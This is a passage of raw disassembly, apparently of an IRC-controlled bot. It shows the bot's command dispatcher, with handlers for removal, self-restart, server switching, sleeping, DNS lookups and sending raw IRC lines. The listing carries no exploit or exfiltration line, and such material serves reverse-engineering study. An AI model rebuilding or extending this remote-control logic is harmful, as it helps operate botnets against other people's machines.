push 0
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_4017AA
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B47D: ; CODE XREF: sub_40A9CF+A90�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419C70
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B4AE
push 1
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_4017AA
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B4AE: ; CODE XREF: sub_40A9CF+AC1�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419C64
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B4D5
lea eax, [ebp+var_1A4]
push eax
call sub_409BF1
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B4D5: ; CODE XREF: sub_40A9CF+AF2�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419C5C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B508
push offset dword_41F018
push offset dword_419C4C
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B508: ; CODE XREF: sub_40A9CF+B19�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419C40
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B536
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_413FE7
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B536: ; CODE XREF: sub_40A9CF+B4C�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419C34
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40B575
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419C28
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40B575
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419C1C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B5A7
loc_40B575: ; CODE XREF: sub_40A9CF+B7A�j
; sub_40A9CF+B8F�j
mov eax, [ebp+arg_14]
push dword ptr [eax+14h]
mov eax, [ebp+arg_14]
push dword ptr [eax+10h]
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_413AB0
add esp, 18h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B5A7: ; CODE XREF: sub_40A9CF+BA4�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419C0C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B5CE
lea eax, [ebp+var_1A4]
push eax
call sub_41417D
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B5CE: ; CODE XREF: sub_40A9CF+BEB�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419BF8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B631
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jz short loc_40B61B
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_41673F
pop ecx
test eax, eax
jnz short loc_40B601
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B601: ; CODE XREF: sub_40A9CF+C2B�j
push 104h
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
push offset dword_41ED10
call sub_407A56
add esp, 0Ch
jmp short loc_40B62C
; ---------------------------------------------------------------------------
loc_40B61B: ; CODE XREF: sub_40A9CF+C1B�j
push offset dword_41EBFC
push offset dword_41ED10
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40B62C: ; CODE XREF: sub_40A9CF+C4A�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B631: ; CODE XREF: sub_40A9CF+C12�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419BE8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B678
mov eax, [ebp+arg_14]
push dword ptr [eax+14h]
mov eax, [ebp+arg_14]
push dword ptr [eax+10h]
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_414600
add esp, 18h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B678: ; CODE XREF: sub_40A9CF+C75�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419BE0
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40B791
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jnz short loc_40B69F
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B69F: ; CODE XREF: sub_40A9CF+CC9�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_416B40 ; strlen
pop ecx
shl eax, 1
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_5A68], eax
cmp [ebp+var_5A68], 0
jnz short loc_40B6C8
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B6C8: ; CODE XREF: sub_40A9CF+CF2�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_416B40 ; strlen
pop ecx
push eax
push [ebp+var_5A68]
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_40EB4E
add esp, 0Ch
push [ebp+var_5A68]
push offset dword_419BC4
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_5A68]
call sub_416B4C ; free
pop ecx
push 1000h
lea eax, [ebp+var_1A60]
push eax
call sub_4104A3
pop ecx
pop ecx
call sub_416B64 ; clock
mov [ebp+var_A60], eax
and [ebp+var_1A64], 0
jmp short loc_40B743
; ---------------------------------------------------------------------------
loc_40B736: ; CODE XREF: sub_40A9CF+D9B�j
mov eax, [ebp+var_1A64]
inc eax
mov [ebp+var_1A64], eax
loc_40B743: ; CODE XREF: sub_40A9CF+D65�j
cmp [ebp+var_1A64], 186A0h
jge short loc_40B76C
push 1000h
lea eax, [ebp+var_5A64]
push eax
lea eax, [ebp+var_1A60]
push eax
call sub_40EB4E
add esp, 0Ch
jmp short loc_40B736
; ---------------------------------------------------------------------------
loc_40B76C: ; CODE XREF: sub_40A9CF+D7E�j
call sub_416B64 ; clock
sub eax, [ebp+var_A60]
push eax
push offset aItTookMeUms_ ; "It took me %ums."
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B791: ; CODE XREF: sub_40A9CF+CBC�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419BA4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B823
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jnz short loc_40B7B4
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B7B4: ; CODE XREF: sub_40A9CF+DDE�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_416B40 ; strlen
pop ecx
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_5A6C], eax
cmp [ebp+var_5A6C], 0
jnz short loc_40B7DB
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B7DB: ; CODE XREF: sub_40A9CF+E05�j
push [ebp+var_5A6C]
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_40E9C9
pop ecx
pop ecx
mov ecx, [ebp+var_5A6C]
and byte ptr [ecx+eax], 0
push [ebp+var_5A6C]
push offset dword_419B88
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_5A6C]
call sub_416B4C ; free
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B823: ; CODE XREF: sub_40A9CF+DD5�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419B78
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B873
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40B85C
push offset dword_41F018
push offset dword_419B64
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp short loc_40B86E
; ---------------------------------------------------------------------------
loc_40B85C: ; CODE XREF: sub_40A9CF+E70�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_41F018
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40B86E: ; CODE XREF: sub_40A9CF+E8B�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B873: ; CODE XREF: sub_40A9CF+E67�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419B58
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B899
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_4097A7
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B899: ; CODE XREF: sub_40A9CF+EB7�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419B4C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B8C7
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_403FE5
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B8C7: ; CODE XREF: sub_40A9CF+EDD�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419B3C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B8ED
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_4098F3
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B8ED: ; CODE XREF: sub_40A9CF+F0B�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419B30
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B91B
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_406722
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B91B: ; CODE XREF: sub_40A9CF+F31�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419B20
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B949
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_412F07
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B949: ; CODE XREF: sub_40A9CF+F5F�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419B14
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B98A
mov eax, [ebp+arg_14]
push dword ptr [eax+10h]
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_40A1A7
add esp, 14h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B98A: ; CODE XREF: sub_40A9CF+F8D�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419B08
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B9BF
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_40A50E
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B9BF: ; CODE XREF: sub_40A9CF+FCE�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419AFC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B9F5
push offset dword_41EBFC
push offset aQuitSRemoved_ ; "QUIT :%s removed."
call sub_40D6CB
pop ecx
pop ecx
push 36EE80h
call ds:dword_41709C ; Sleep
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B9F5: ; CODE XREF: sub_40A9CF+1003�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419ADC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BA79
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BA18
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BA18: ; CODE XREF: sub_40A9CF+1042�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_41DB88
call sub_416B3A ; strcpy
pop ecx
pop ecx
mov eax, [ebp+arg_14]
cmp dword ptr [eax+8], 0
jz short loc_40BA41
mov eax, [ebp+arg_14]
mov eax, [eax+8]
mov [ebp+var_63EC], eax
jmp short loc_40BA4B
; ---------------------------------------------------------------------------
loc_40BA41: ; CODE XREF: sub_40A9CF+1062�j
mov [ebp+var_63EC], offset byte_41DF00
loc_40BA4B: ; CODE XREF: sub_40A9CF+1070�j
push [ebp+var_63EC]
push offset dword_41EE18
call sub_416B3A ; strcpy
pop ecx
pop ecx
push offset dword_41EE18
push offset dword_41DB88
push offset dword_419AD0
call sub_40D6CB
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BA79: ; CODE XREF: sub_40A9CF+1039�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419AC4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BADB
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BA9C
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BA9C: ; CODE XREF: sub_40A9CF+10C6�j
mov eax, [ebp+arg_14]
cmp dword ptr [eax+8], 0
jz short loc_40BAB3
mov eax, [ebp+arg_14]
mov eax, [eax+8]
mov [ebp+var_63F0], eax
jmp short loc_40BABD
; ---------------------------------------------------------------------------
loc_40BAB3: ; CODE XREF: sub_40A9CF+10D4�j
mov [ebp+var_63F0], offset byte_41DF00
loc_40BABD: ; CODE XREF: sub_40A9CF+10E2�j
push [ebp+var_63F0]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_419AD0
call sub_40D6CB
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BADB: ; CODE XREF: sub_40A9CF+10BD�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419AB8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BB15
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BAFE
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BAFE: ; CODE XREF: sub_40A9CF+1128�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_419AB0
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BB15: ; CODE XREF: sub_40A9CF+111F�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419AA4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BB6C
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BB38
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BB38: ; CODE XREF: sub_40A9CF+1162�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_5A70], eax
cmp [ebp+var_5A70], 927C0h
jle short loc_40BB5B
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BB5B: ; CODE XREF: sub_40A9CF+1185�j
push [ebp+var_5A70]
call ds:dword_41709C ; Sleep
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BB6C: ; CODE XREF: sub_40A9CF+1159�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419A9C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BBB0
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jz short loc_40BB93
mov eax, [ebp+arg_18]
cmp dword ptr [eax+8], 0
jnz short loc_40BB98
loc_40BB93: ; CODE XREF: sub_40A9CF+11B9�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BB98: ; CODE XREF: sub_40A9CF+11C2�j
mov eax, [ebp+arg_18]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_40D4AB
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BBB0: ; CODE XREF: sub_40A9CF+11B0�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419A90
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BBF4
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jz short loc_40BBD7
mov eax, [ebp+arg_18]
cmp dword ptr [eax+8], 0
jnz short loc_40BBDC
loc_40BBD7: ; CODE XREF: sub_40A9CF+11FD�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BBDC: ; CODE XREF: sub_40A9CF+1206�j
mov eax, [ebp+arg_18]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_40D420
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BBF4: ; CODE XREF: sub_40A9CF+11F4�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419A88
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BC28
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jnz short loc_40BC17
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BC17: ; CODE XREF: sub_40A9CF+1241�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_40D6CB
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BC28: ; CODE XREF: sub_40A9CF+1238�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419A7C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BCB2
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BC84
cmp ds:dword_41DF08, 0
jz short loc_40BC5B
mov [ebp+var_63F4], offset aOn ; "on"
jmp short loc_40BC65
; ---------------------------------------------------------------------------
loc_40BC5B: ; CODE XREF: sub_40A9CF+127E�j
mov [ebp+var_63F4], offset aOff ; "off"
loc_40BC65: ; CODE XREF: sub_40A9CF+128A�j
push [ebp+var_63F4]
push offset aDebugModeIsS_ ; "Debug mode is %s."
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BC84: ; CODE XREF: sub_40A9CF+1275�j
push offset aOn ; "on"
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40BCA6
mov ds:dword_41DF08, 1
jmp short loc_40BCAD
; ---------------------------------------------------------------------------
loc_40BCA6: ; CODE XREF: sub_40A9CF+12C9�j
and ds:dword_41DF08, 0
loc_40BCAD: ; CODE XREF: sub_40A9CF+12D5�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BCB2: ; CODE XREF: sub_40A9CF+126C�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419A50
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BCD9
lea eax, [ebp+var_1A4]
push eax
call sub_415DFD
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BCD9: ; CODE XREF: sub_40A9CF+12F6�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419A44
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BD13
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BCFC
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BCFC: ; CODE XREF: sub_40A9CF+1326�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
push offset dword_419A3C
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BD13: ; CODE XREF: sub_40A9CF+131D�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419A30
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40BD52
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419A24
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40BD52
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419A1C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BD62
loc_40BD52: ; CODE XREF: sub_40A9CF+1357�j
; sub_40A9CF+136C�j
push offset aQuitExitting ; "QUIT :exitting"
call sub_40D6CB
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BD62: ; CODE XREF: sub_40A9CF+1381�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419A10
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BDC9
push 104h
lea eax, [ebp+var_5B74]
push eax
push 0
call ds:dword_41708C ; GetModuleHandleA
push eax
call ds:dword_417090 ; GetModuleFileNameA
push 0
push 0
push 0
lea eax, [ebp+var_5B74]
push eax
push offset aOpen ; "open"
push 0
call ds:dword_4171D0 ; ShellExecuteA
cmp eax, 20h
ja short loc_40BDB6
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BDB6: ; CODE XREF: sub_40A9CF+13E0�j
push offset aQuitRestarting ; "QUIT :restarting"
call sub_40D6CB
pop ecx
push 0
call ds:dword_41705C ; ExitProcess
loc_40BDC9: ; CODE XREF: sub_40A9CF+13A6�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419A04
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BE19
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BDEC
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BDEC: ; CODE XREF: sub_40A9CF+1416�j
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movzx eax, byte ptr [eax]
push eax
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movzx eax, byte ptr [eax]
push eax
push offset dword_4199D4
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 10h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BE19: ; CODE XREF: sub_40A9CF+140D�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_4199C4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BE38
call sub_407148
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BE38: ; CODE XREF: sub_40A9CF+145D�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_4199BC
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40BE62
mov eax, [ebp+var_1A8]
sub eax, ds:dword_4199B0
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BE7B
loc_40BE62: ; CODE XREF: sub_40A9CF+147C�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_401D6E
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BE7B: ; CODE XREF: sub_40A9CF+1491�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_4199A8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BEA9
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_40CEB0
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BEA9: ; CODE XREF: sub_40A9CF+14BF�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_41999C
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40BED3
mov eax, [ebp+var_1A8]
sub eax, ds:dword_41998C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BEFD
loc_40BED3: ; CODE XREF: sub_40A9CF+14ED�j
push offset aQuitChangingSe ; "QUIT :changing server"
call sub_40D6CB
pop ecx
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_40D366
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BEFD: ; CODE XREF: sub_40A9CF+1502�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_41996C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40C0D9
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BF29
mov eax, [ebp+arg_14]
mov dword ptr [eax+4], offset byte_41DF00
loc_40BF29: ; CODE XREF: sub_40A9CF+154E�j
lea eax, [ebp+var_5B78]
push eax
push 0
push 0
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call ds:dword_41DF54 ; getaddrinfo
test eax, eax
jnz loc_40C0BA
mov eax, [ebp+var_5B78]
mov [ebp+var_5B7C], eax
loc_40BF54: ; CODE XREF: sub_40A9CF+16D8�j
cmp [ebp+var_5B7C], 0
jz loc_40C0AC
push 2
push 0
push 0
push 401h
lea eax, [ebp+var_5F80]
push eax
mov eax, [ebp+var_5B7C]
push dword ptr [eax+10h]
mov eax, [ebp+var_5B7C]
push dword ptr [eax+18h]
call ds:dword_41DF58 ; getnameinfo
test eax, eax
jnz loc_40C098
mov eax, [ebp+var_5B7C]
cmp dword ptr [eax+4], 2
jnz short loc_40BFEA
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40BFBA
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov [ebp+var_63F8], eax
jmp short loc_40BFC4
; ---------------------------------------------------------------------------
loc_40BFBA: ; CODE XREF: sub_40A9CF+15DB�j
mov [ebp+var_63F8], offset dword_419968
loc_40BFC4: ; CODE XREF: sub_40A9CF+15E9�j
lea eax, [ebp+var_5F80]
push eax
push [ebp+var_63F8]
push offset dword_419944
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 10h
jmp loc_40C08D
; ---------------------------------------------------------------------------
loc_40BFEA: ; CODE XREF: sub_40A9CF+15CE�j
mov eax, [ebp+var_5B7C]
cmp dword ptr [eax+4], 17h
jnz short loc_40C03E
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40C011
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov [ebp+var_63FC], eax
jmp short loc_40C01B
; ---------------------------------------------------------------------------
loc_40C011: ; CODE XREF: sub_40A9CF+1632�j
mov [ebp+var_63FC], offset dword_419968
loc_40C01B: ; CODE XREF: sub_40A9CF+1640�j
lea eax, [ebp+var_5F80]
push eax
push [ebp+var_63FC]
push offset dword_419920
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 10h
jmp short loc_40C08D
; ---------------------------------------------------------------------------
loc_40C03E: ; CODE XREF: sub_40A9CF+1625�j
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40C059
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov [ebp+var_6400], eax
jmp short loc_40C063
; ---------------------------------------------------------------------------
loc_40C059: ; CODE XREF: sub_40A9CF+167A�j
mov [ebp+var_6400], offset dword_419968
loc_40C063: ; CODE XREF: sub_40A9CF+1688�j
lea eax, [ebp+var_5F80]
push eax
mov eax, [ebp+var_5B7C]
push dword ptr [eax+4]
push [ebp+var_6400]
push offset dword_4198EC
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 14h
loc_40C08D: ; CODE XREF: sub_40A9CF+1616�j
; sub_40A9CF+166D�j
push 3E8h
call ds:dword_41709C ; Sleep
loc_40C098: ; CODE XREF: sub_40A9CF+15BE�j
mov eax, [ebp+var_5B7C]
mov eax, [eax+1Ch]
mov [ebp+var_5B7C], eax
jmp loc_40BF54
; ---------------------------------------------------------------------------
loc_40C0AC: ; CODE XREF: sub_40A9CF+158C�j
push [ebp+var_5B78]
call ds:dword_41DF5C ; freeaddrinfo
jmp short loc_40C0D4
; ---------------------------------------------------------------------------
loc_40C0BA: ; CODE XREF: sub_40A9CF+1573�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_4198D0
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40C0D4: ; CODE XREF: sub_40A9CF+16E9�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C0D9: ; CODE XREF: sub_40A9CF+1541�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_4198C4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40C1D4
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40C105
mov eax, [ebp+arg_14]
mov dword ptr [eax+4], offset byte_41DF00
loc_40C105: ; CODE XREF: sub_40A9CF+172A�j
lea eax, [ebp+var_5F84]
push eax
push 0
push 0
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call ds:dword_41DF54 ; getaddrinfo
test eax, eax
jnz loc_40C1B5
push 4
push 0
push 0
push 401h
lea eax, [ebp+var_6388]
push eax
mov eax, [ebp+var_5F84]
push dword ptr [eax+10h]
mov eax, [ebp+var_5F84]
push dword ptr [eax+18h]
call ds:dword_41DF58 ; getnameinfo
test eax, eax
jnz short loc_40C1A9
push [ebp+var_5F84]
call ds:dword_41DF5C ; freeaddrinfo
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40C179
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov [ebp+var_6404], eax
jmp short loc_40C183
; ---------------------------------------------------------------------------
